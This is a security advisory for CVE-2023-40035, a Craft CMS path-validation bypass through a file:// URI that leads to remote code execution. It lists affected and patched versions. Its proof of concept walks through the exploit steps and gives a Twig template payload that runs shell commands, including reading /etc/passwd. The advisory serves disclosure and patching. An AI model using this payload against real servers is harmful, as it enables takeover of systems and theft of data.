CVE-2023-40035: Remote Code Execution via validatePath bypass

Package

Affected versions

>= 4.0.0-RC1, <= 4.4.14

>= 3.0.0, <= 3.8.14

Patched versions

4.4.15

3.8.15

Summary

Bypassing the validatePath function can lead to potential Remote Code Execution
(Post-authentication, ALLOW_ADMIN_CHANGES=true)

Details

In bootstrap.php, the SystemPaths path is set as below.

// Set the vendor path. By default assume that it’s 4 levels up from here $vendorPath = $findConfigPath('–vendorPath’, ‘CRAFT_VENDOR_PATH’) ?? dirname(__DIR__, 3);

// Set the “project root” path that contains config/, storage/, etc. By default assume that it’s up a level from vendor/. $rootPath = $findConfigPath('–basePath’, ‘CRAFT_BASE_PATH’) ?? dirname($vendorPath);

// By default the remaining directories will be in the base directory $dotenvPath = $findConfigPath('–dotenvPath’, ‘CRAFT_DOTENV_PATH’) ?? "$rootPath/.env"; $configPath = $findConfigPath('–configPath’, ‘CRAFT_CONFIG_PATH’) ?? "$rootPath/config"; $contentMigrationsPath = $findConfigPath('–contentMigrationsPath’, ‘CRAFT_CONTENT_MIGRATIONS_PATH’) ?? "$rootPath/migrations"; $storagePath = $findConfigPath('–storagePath’, ‘CRAFT_STORAGE_PATH’) ?? "$rootPath/storage"; $templatesPath = $findConfigPath('–templatesPath’, ‘CRAFT_TEMPLATES_PATH’) ?? "$rootPath/templates"; $translationsPath = $findConfigPath('–translationsPath’, ‘CRAFT_TRANSLATIONS_PATH’) ?? "$rootPath/translations"; $testsPath = $findConfigPath('–testsPath’, ‘CRAFT_TESTS_PATH’) ?? "$rootPath/tests";

Because paths are validated based on the /path1/path2 format, this can be bypassed using a file URI scheme such as file:///path1/path2. File scheme is supported in mkdir()

/\*\*
 \* @param string $attribute
 \* @param array|null $params
 \* @param InlineValidator $validator
 \* @return void
 \* @since 4.4.6
 \*/
public function validatePath(string $attribute, ?array $params, InlineValidator $validator): void
{
    // Make sure it’s not within any of the system directories
    $path = FileHelper::absolutePath($this\->getRootPath(), '/');

    $systemDirs = Craft::$app\->getPath()->getSystemPaths();

    foreach ($systemDirs as $dir) {
        $dir = FileHelper::absolutePath($dir, '/');
        if (str\_starts\_with("$path/", "$dir/")) {
            $validator\->addError($this, $attribute, Craft::t('app', 'Local volumes cannot be located within system directories.'));
            break;
        }
    }
}

ref. https://www.php.net/manual/en/wrappers.file.php

PoC

1. Create a new filesystem. Base Path: file:///var/www/html/templates

2. Create a new asset volume. Asset Filesystem: local_bypass

3. Upload a ttml file with rce template code. Confirm poc.ttml file created in /var/www/html/templates

{{’<pre>’}} {{1337*1337}} {{[‘cat /etc/passwd’]|map(‘passthru’)|join}} {{[‘id;pwd;ls -altr /’]|map(‘passthru’)|join}}

4. Create a new route. URI: * , Template: poc.ttml

5. Confirm RCE on arbitrary path ( /* )

PoC Env

Impact

Take control of vulnerable systems, Data exfiltrations, Malware execution, Pivoting, etc.

although the vulnerability is exploitable only in the authenticated users, configuration with ALLOW_ADMIN_CHANGES=true, there is still a potential security threat (Remote Code Execution)